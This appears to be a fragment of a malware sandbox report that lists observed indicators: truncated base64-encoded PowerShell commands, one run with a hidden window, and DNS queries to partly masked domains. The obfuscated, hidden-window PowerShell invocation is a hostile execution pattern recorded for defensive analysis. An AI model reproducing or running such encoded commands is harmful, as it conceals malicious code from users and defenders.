Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAVQB2AGsAYgBsAHYAcgBjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEYAaABuAHQAYQBxAG0AbABxAHIAZwAgACMAPgAgACQASAB5AGMAeABxAGcAeABqAG0APQAnAFIAawBlAGsAYgBi...
- DNS ASK pe###otics.com
- DNS ASK ci##may.biz
- DNS ASK mp##bin.com
- DNS ASK fo####itlife.com
- DNS ASK fl#####ohonuicoc.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAVQB2AGsAYgBsAHYAcgBjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEYAaABuAHQAYQBxAG0AbABxAHIAZwAgACMAPgAgACQASAB5AGMAeABxAGcAeABqAG0APQAnAFIAawBlAGsAYgBi...' (with hidden window)